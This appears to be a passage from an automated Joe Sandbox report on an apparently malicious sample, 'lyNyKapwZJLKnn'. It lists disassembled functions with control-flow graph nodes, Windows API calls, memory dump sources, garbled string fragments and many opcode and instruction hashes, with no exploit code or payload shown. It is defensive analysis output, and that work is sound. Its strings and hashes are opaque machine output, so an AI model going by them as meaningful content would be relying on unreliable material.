                                                                                • Opcode Fuzzy Hash: bf13fa51afea8996f6fa78a4211bfd489a2c40957eee1e7282ea6e00619c4095
                                                                                • Instruction Fuzzy Hash: 415156B0901309CFDB14DFA9D548BDEBBF1EF88314F208459E019A72A1DB799944CF25
                                                                                Function 0173D578 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 316 173d578-173d607 GetCurrentProcess 320 173d610-173d644 GetCurrentThread 316->320 321 173d609-173d60f 316->321 322 173d646-173d64c 320->322 323 173d64d-173d681 GetCurrentProcess 320->323 321->320 322->323 325 173d683-173d689 323->325 326 173d68a-173d6a5 call 173d747 323->326 325->326 328 173d6ab-173d6da GetCurrentThreadId 326->328 330 173d6e3-173d745 328->330 331 173d6dc-173d6e2 328->331 331->330
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 0173D5F6
                                                                                • GetCurrentThread.KERNEL32 ref: 0173D633
                                                                                • GetCurrentProcess.KERNEL32 ref: 0173D670
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0173D6C9
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1767784592.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_1730000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: 6b2a6eb5bb378e8d5a5d9c498f9ae02d8d8b06fc004d2bee792540b8f83c0bf5
                                                                                • Instruction ID: 52aaa9d5006ef9ab6069c1caba8825d01d1f5c323bb510f5533cc66f76d33448
                                                                                • Opcode Fuzzy Hash: 6b2a6eb5bb378e8d5a5d9c498f9ae02d8d8b06fc004d2bee792540b8f83c0bf5
                                                                                • Instruction Fuzzy Hash: F65143B0901309CFDB14EFAAD548B9EBBF1EB88314F208459E019A72A1DB799944CF65
                                                                                Function 0173B2E1 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 384 173b2e1-173b2ff 385 173b301-173b30e call 1738840 384->385 386 173b32b-173b32f 384->386 392 173b310 385->392 393 173b324 385->393 388 173b343-173b384 386->388 389 173b331-173b33b 386->389 395 173b391-173b39f 388->395 396 173b386-173b38e 388->396 389->388 439 173b316 call 173b579 392->439 440 173b316 call 173b588 392->440 393->386 397 173b3c3-173b3c5 395->397 398 173b3a1-173b3a6 395->398 396->395 403 173b3c8-173b3cf 397->403 400 173b3b1 398->400 401 173b3a8-173b3af call 173acc4 398->401 399 173b31c-173b31e 399->393 402 173b460-173b520 399->402 405 173b3b3-173b3c1 400->405 401->405 434 173b522-173b525 402->434 435 173b528-173b553 GetModuleHandleW 402->435 406 173b3d1-173b3d9 403->406 407 173b3dc-173b3e3 403->407 405->403 406->407 408 173b3f0-173b3f9 call 173acd4 407->408 409 173b3e5-173b3ed 407->409 415 173b406-173b40b 408->415 416 173b3fb-173b403 408->416 409->408 417 173b429-173b42d 415->417 418 173b40d-173b414 415->418 416->415 441 173b430 call 173b860 417->441 442 173b430 call 173b888 417->442 418->417 420 173b416-173b426 call 173ace4 call 173acf4 418->420 420->417 423 173b433-173b436 425 173b459-173b45f 423->425 426 173b438-173b456 423->426 426->425 434->435 436 173b555-173b55b 435->436 437 173b55c-173b570 435->437 436->437 439->399 440->399 441->423 442->423
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0173B546
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1767784592.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_1730000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: eda21dd451fd4daebc480435922ce2f652e6f372a830334b20b26806c08b9539
                                                                                • Instruction ID: 71c76787151fdf4961925d765619315e6c1ac464710d3f2ef32393617d83fb77
                                                                                • Opcode Fuzzy Hash: eda21dd451fd4daebc480435922ce2f652e6f372a830334b20b26806c08b9539
                                                                                • Instruction Fuzzy Hash: D38123B0A00B558FDB64DF29D14475ABBF1FF88300F10892ED48ADBA51D774E946CB91
                                                                                Function 0173480C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 443 173480c-1735cd1 CreateActCtxA 446 1735cd3-1735cd9 443->446 447 1735cda-1735d34 443->447 446->447 454 1735d43-1735d47 447->454 455 1735d36-1735d39 447->455 456 1735d49-1735d55 454->456 457 1735d58-1735d88 454->457 455->454 456->457 461 1735d3a-1735d3f 457->461 462 1735d8a-1735e0c 457->462 461->454
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 01735CC1
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1767784592.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_1730000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: 1f6f8ab6a41100844cc334c30d30c475ea4fa4aba30d9866645074e4c28fd2a6
                                                                                • Instruction ID: fd82a8b5d8b8830393b3d80a22db7ffe5f16c301022cc1245d5fbdba94faab9a
                                                                                • Opcode Fuzzy Hash: 1f6f8ab6a41100844cc334c30d30c475ea4fa4aba30d9866645074e4c28fd2a6
                                                                                • Instruction Fuzzy Hash: 5641C0B0D0071DCFDB24DFA9C948A9DBBF5BF85704F20806AD409AB251DB75694ACF90
                                                                                Function 01735C04 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 465 1735c04-1735cd1 CreateActCtxA 467 1735cd3-1735cd9 465->467 468 1735cda-1735d34 465->468 467->468 475 1735d43-1735d47 468->475 476 1735d36-1735d39 468->476 477 1735d49-1735d55 475->477 478 1735d58-1735d88 475->478 476->475 477->478 482 1735d3a-1735d3f 478->482 483 1735d8a-1735e0c 478->483 482->475
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 01735CC1
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1767784592.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_1730000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: 4514c0883246b434ba237d9848bfbbd34a219d8625ef47a7cc13197587d92c0c
                                                                                • Instruction ID: 2d9dd9d2d13923d0b3ca04919f6d6909150cd06c156604c43264636971aa2855
                                                                                • Opcode Fuzzy Hash: 4514c0883246b434ba237d9848bfbbd34a219d8625ef47a7cc13197587d92c0c
                                                                                • Instruction Fuzzy Hash: 7141C2B0C00719CEDB24DFA9C948ADDBBB1BF85304F20816AD419AB251DB75694ACF90
                                                                                Function 0173D7C0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 491 173d7c0-173d854 DuplicateHandle 492 173d856-173d85c 491->492 493 173d85d-173d87a 491->493 492->493
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0173D847
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1767784592.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_1730000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 7c7c6a2881c0b8554c8b2a9adf282e9d59f8b59857f5ab1a1a0d35be78d07c2b
                                                                                • Instruction ID: 5f31b2c881e6be04e90ebb7534bed61455bede6761e347cbb9ce8baf408ac594
                                                                                • Opcode Fuzzy Hash: 7c7c6a2881c0b8554c8b2a9adf282e9d59f8b59857f5ab1a1a0d35be78d07c2b
                                                                                • Instruction Fuzzy Hash: 1621E4B59003489FDB10CF9AD984ADEFFF5EB48310F14801AE958A3351D374A944CF60
                                                                                Function 0173D7B8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 486 173d7b8-173d854 DuplicateHandle 487 173d856-173d85c 486->487 488 173d85d-173d87a 486->488 487->488
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0173D847
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1767784592.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_1730000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 3e146052ed16b5ebdc5057faa55690cd43e9ce6e240ce6d4abca344c4d3dc453
                                                                                • Instruction ID: c719fe2fcf4564a3e00bf0e317add49ebb2b405418bc845f53bde74ad1841c89
                                                                                • Opcode Fuzzy Hash: 3e146052ed16b5ebdc5057faa55690cd43e9ce6e240ce6d4abca344c4d3dc453
                                                                                • Instruction Fuzzy Hash: F421E0B5D002099FDB10CFAAD984ADEBBF5EB48320F14841AE958A7251D378A944CF61
                                                                                Function 0173B4E0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 496 173b4e0-173b520 497 173b522-173b525 496->497 498 173b528-173b553 GetModuleHandleW 496->498 497->498 499 173b555-173b55b 498->499 500 173b55c-173b570 498->500 499->500
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0173B546
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1767784592.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_1730000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: 942ef72af58b53655528060ed4f4ac9645fe9cc3b43876076c5b98cbf4d318f9
                                                                                • Instruction ID: c6de7be40df18dd45ae184c909b96fac4f6299afdab47c5e6e40627a59b72fda
                                                                                • Opcode Fuzzy Hash: 942ef72af58b53655528060ed4f4ac9645fe9cc3b43876076c5b98cbf4d318f9
                                                                                • Instruction Fuzzy Hash: EF110FB5C003498FDB10DF9AC444A9EFBF4AB88324F20842AD519A7241C379A645CFA1
                                                                                Function 0158D1FC Relevance: .1, Instructions: 76COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1767382451.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_158d000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1fb8679e17612c4e14f02414f4fcd8f587e947abf9b5a201bd17a1377ea73994
                                                                                • Instruction ID: aeee23a6be3395c8e1642ee67e023a9949427605ea202951a18facd00e88f071
                                                                                • Opcode Fuzzy Hash: 1fb8679e17612c4e14f02414f4fcd8f587e947abf9b5a201bd17a1377ea73994
                                                                                • Instruction Fuzzy Hash: 1F21C771504244DFDB06EF98D9C4B2ABFF5FB84320F24C569E90A5E286C336D416CB61
                                                                                Function 0158D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1767382451.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_158d000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0ef673aab4647b80b8581263c2976fb71c7a1870c6c6494c6f48a7dca5269f1b
                                                                                • Instruction ID: 513ff45d99a06d2fb86494698b3e5396e60f7c8bfe8f5c72e8d94d9ebce5608b
                                                                                • Opcode Fuzzy Hash: 0ef673aab4647b80b8581263c2976fb71c7a1870c6c6494c6f48a7dca5269f1b
                                                                                • Instruction Fuzzy Hash: B821F4B1504240DFDB05EF58D9C0B2ABFF5FB84318F24C56AD9091E296C336D416CAB1
                                                                                Function 0159D01C Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1767439168.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_159d000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 85ce1b0c46e5ebb487de1bbe90729248edb8759a81cfded3affd14c5420313a0
                                                                                • Instruction ID: 19eec2539dc7b2726a0be13f3729373048b65f1cbf970062e1bf1be2fed9cd1c
                                                                                • Opcode Fuzzy Hash: 85ce1b0c46e5ebb487de1bbe90729248edb8759a81cfded3affd14c5420313a0
                                                                                • Instruction Fuzzy Hash: 2D210075604200DFDF15DF68D884B2ABBB5FB84354F20CA6DD80A0F282D33AD807CA62
                                                                                Function 0159D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1767439168.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_159d000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8b6b6194fd9e135ad1c8102ec8ec08ad4ac7a5d4f5615d8af2f9d22be497ce86
                                                                                • Instruction ID: 8a975e7dfff3a50ae4f7f274e513277df8583e12fd459772444ef5ce7f867191
                                                                                • Opcode Fuzzy Hash: 8b6b6194fd9e135ad1c8102ec8ec08ad4ac7a5d4f5615d8af2f9d22be497ce86
                                                                                • Instruction Fuzzy Hash: 1921C875504204DFDF05DF54D5C4B15BBB5FB84324F24C9ADD90A4F296C33AD446CA62
                                                                                Function 0159D006 Relevance: .1, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1767439168.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_159d000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f0fd5e06ef9934ae07d5a3c3f4e3eb77cf7a4a35799864d4f67c759712903233
                                                                                • Instruction ID: 74ede861a98074dc533b7c8d8f226379e20a0a3625a5a349a1c653727f5b66dd
                                                                                • Opcode Fuzzy Hash: f0fd5e06ef9934ae07d5a3c3f4e3eb77cf7a4a35799864d4f67c759712903233
                                                                                • Instruction Fuzzy Hash: E6219F755093808FDB03CF64D994715BF71FB46214F28C5EAD8498F2A7C33A980ACB62
                                                                                Function 0158D1F7 Relevance: .1, Instructions: 57COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1767382451.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_158d000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3660dfe55a9ec3abc1fd528c2c7e977daaa4d4c3ae68719e8bb560421c7628fc
                                                                                • Instruction ID: 6a3d77c17bae9e4391727e3a94e2905ddaaff437bfe56bb30982b5feac6561a5
                                                                                • Opcode Fuzzy Hash: 3660dfe55a9ec3abc1fd528c2c7e977daaa4d4c3ae68719e8bb560421c7628fc
                                                                                • Instruction Fuzzy Hash: 0921C076504244CFDB06DF44D9C4B1ABFB2FB84320F24C1A9DD054A296C33AD416CB91
                                                                                Function 0158D4BF Relevance: .1, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1767382451.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_158d000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                • Instruction ID: 96a20594fb5d55c005d5dfd4265910eb64b26a2c49006d9e121cad6dff6cccd2
                                                                                • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                • Instruction Fuzzy Hash: A811E176504280CFCB02DF54D5C4B1ABFB2FB84324F24C6AAD8090F696C33AD45ACBA1
                                                                                Function 0159D1CF Relevance: .1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1767439168.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_159d000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                • Instruction ID: 16c811ec8446b7671b4c614bf7b5fcca39b213b4121ab0a0e7c9c82cfb5ddc79
                                                                                • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                • Instruction Fuzzy Hash: 8011BB75904280DFDF02CF54C5C4B19BBB2FB84224F28C6ADD8494F296C33AD40ACB62

                                                                                Executed Functions

                                                                                Function 01146FC8 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.4142435959.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_1140000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (o^q$(o^q$(o^q$,bq$,bq
                                                                                • API String ID: 0-2525668591
                                                                                • Opcode ID: 72b89e7351c522bdada17fbd6cd107955d3951418246ded768dd8a05f35a17a5
                                                                                • Instruction ID: 2f494e190be0ac39c06d9c49d8fbebe69ccf05be314b58189fabaddf6d9d52f3
                                                                                • Opcode Fuzzy Hash: 72b89e7351c522bdada17fbd6cd107955d3951418246ded768dd8a05f35a17a5
                                                                                • Instruction Fuzzy Hash: AF126E70A01259CFCB19CF68C984AADBFF2FF89700F158469E915AB2A1D730DD41CB91
                                                                                Function 01149DE0 Relevance: 6.1, Strings: 4, Instructions: 1131COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.4142435959.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_1140000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (o^q$4'^q$4'^q$4'^q
                                                                                • API String ID: 0-183542557
                                                                                • Opcode ID: bbd9f0539196fdd7be2eadc1199d1b1bc4242da252729fe2678644c80c09bad6
                                                                                • Instruction ID: 4c125165b00a07e51ee84c273daf7f1b2776fdb9ee690d69835715c5d3c3b6ac
                                                                                • Opcode Fuzzy Hash: bbd9f0539196fdd7be2eadc1199d1b1bc4242da252729fe2678644c80c09bad6
                                                                                • Instruction Fuzzy Hash: FAA2B070A40209CFCB19CF68D584AAEBBF2FF89710F168569E506DB366D731E881CB51
                                                                                Function 011429EC Relevance: 5.4, Strings: 4, Instructions: 436COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.4142435959.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_1140000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Xbq$Xbq$Xbq$Xbq
                                                                                • API String ID: 0-2732225958
                                                                                • Opcode ID: 2861424a2f60767e244ff892abd4273bfcab8384e1a2d5d1d781613b2ef9187e
                                                                                • Instruction ID: 0e999d46431255ca94224a9e1a9341d307f689ca85000c630e9baf998179b797
                                                                                • Opcode Fuzzy Hash: 2861424a2f60767e244ff892abd4273bfcab8384e1a2d5d1d781613b2ef9187e
                                                                                • Instruction Fuzzy Hash: 10C17E72D042294BCB2E8F7C94C02EE7F71BF6D724F1945A9D1555B242E7324983CB52
                                                                                Function 011469A0 Relevance: 3.0, Strings: 2, Instructions: 515COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.4142435959.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_1140000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (o^q$Hbq
                                                                                • API String ID: 0-662517225
                                                                                • Opcode ID: af0723ca538ece68352562eae24bb115f7c98a23b0e31b4137ce8fca36f899d6
                                                                                • Instruction ID: 24037c0da6fec5a54424447dec35f2db1fca80f53eae1cdfad38ccbd03cd21df
                                                                                • Opcode Fuzzy Hash: af0723ca538ece68352562eae24bb115f7c98a23b0e31b4137ce8fca36f899d6
                                                                                • Instruction Fuzzy Hash: DA12BE70A002198FCB19DF69C854BAEBBF2BF89704F108569E549DB395DF309D81CB91
                                                                                Function 01143E09 Relevance: 2.8, Strings: 2, Instructions: 265COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.4142435959.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_1140000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Xbq$$^q
                                                                                • API String ID: 0-1593437937
                                                                                • Opcode ID: 395fec2e1e13887d05e9906ed9b028a6573d9c254db9c408e362616d78d2eba0
                                                                                • Instruction ID: cea536325b26c351e641140929facfc006481a3945cb91654b0497d5a46a707b
                                                                                • Opcode Fuzzy Hash: 395fec2e1e13887d05e9906ed9b028a6573d9c254db9c408e362616d78d2eba0
                                                                                • Instruction Fuzzy Hash: 38919174F04219DBDB1DABB8945437E7BA7BFC8B40B05892DE546E7288CF34C8428796
                                                                                Function 0114C146 Relevance: 2.7, Strings: 2, Instructions: 226COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.4142435959.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_1140000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: PH^q$PH^q
                                                                                • API String ID: 0-1598597984
                                                                                • Opcode ID: e52c5ddad778e3c72faecbb59cbcf2312531fe3df98699ce9001d63539bf80bb
                                                                                • Instruction ID: 920f2cbb2fbb2e1b522a4edc4e196b58694dc7292f0418e528655f1f69ebe00a
                                                                                • Opcode Fuzzy Hash: e52c5ddad778e3c72faecbb59cbcf2312531fe3df98699ce9001d63539bf80bb
                                                                                • Instruction Fuzzy Hash: F4A1F474E05218CFDB18CFAAD994B9DBBF2BF89700F15806AE409AB365DB309941CF51
                                                                                Function 01145362 Relevance: 2.7, Strings: 2, Instructions: 193COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.4142435959.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_1140000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: PH^q$PH^q
                                                                                • API String ID: 0-1598597984
                                                                                • Opcode ID: db9170a26e8f956e9458b6525141222a58b28e590115ec447e8895aacb1f279d
                                                                                • Instruction ID: 25e364127574aac02ef9626043b52dae3dc5e353841209b574440e7d5da794a0
                                                                                • Opcode Fuzzy Hash: db9170a26e8f956e9458b6525141222a58b28e590115ec447e8895aacb1f279d
                                                                                • Instruction Fuzzy Hash: 8A91E574E00218CFDB59DFA9D884A9DBBF2BF89300F15C06AD819AB365DB309845CF51
                                                                                Function 0114C468 Relevance: 2.7, Strings: 2, Instructions: 190COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.4142435959.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_1140000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: PH^q$PH^q
                                                                                • API String ID: 0-1598597984
                                                                                • Opcode ID: 460672899ca5668113af49ce6a7ce2306a4aff5a9db6fd61f8b90ec926b5554f
                                                                                • Instruction ID: e6de4d381fada9034922535961bd9d81936df44bb90a0b52394977a3fca142f4
                                                                                • Opcode Fuzzy Hash: 460672899ca5668113af49ce6a7ce2306a4aff5a9db6fd61f8b90ec926b5554f
                                                                                • Instruction Fuzzy Hash: 4F81C074E012188FDB18DFAAD984B9DBBF2BF88700F14D069E819AB365DB305981CF50
                                                                                Function 0114D278 Relevance: 2.7, Strings: 2, Instructions: 187COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.4142435959.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_1140000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: PH^q$PH^q
                                                                                • API String ID: 0-1598597984
                                                                                • Opcode ID: bea5025f0d069a9ad17e7515946850603b6ddac8096607fc206bcfe7a5e27076
                                                                                • Instruction ID: ebdad3144c9c8f80abcb2359955fa90e52b2382a4ec4180e20348268c1c09d6e
                                                                                • Opcode Fuzzy Hash: bea5025f0d069a9ad17e7515946850603b6ddac8096607fc206bcfe7a5e27076
                                                                                • Instruction Fuzzy Hash: D881B3B4E00218CFDF18DFAAD994A9DBBF2BF99300F148069E859AB365DB305945CF10
                                                                                Function 0114CA08 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.4142435959.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_1140000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: PH^q$PH^q
                                                                                • API String ID: 0-1598597984
                                                                                • Opcode ID: 9d43a4ed792c3ce5c9c0b633bc59466d1ab50a7c586cab4df9ffc5e54c0236dd
                                                                                • Instruction ID: c35d83878c53ad5edca915cfabdb286a91e46ab5604cd708788cb08685174b23
                                                                                • Opcode Fuzzy Hash: 9d43a4ed792c3ce5c9c0b633bc59466d1ab50a7c586cab4df9ffc5e54c0236dd
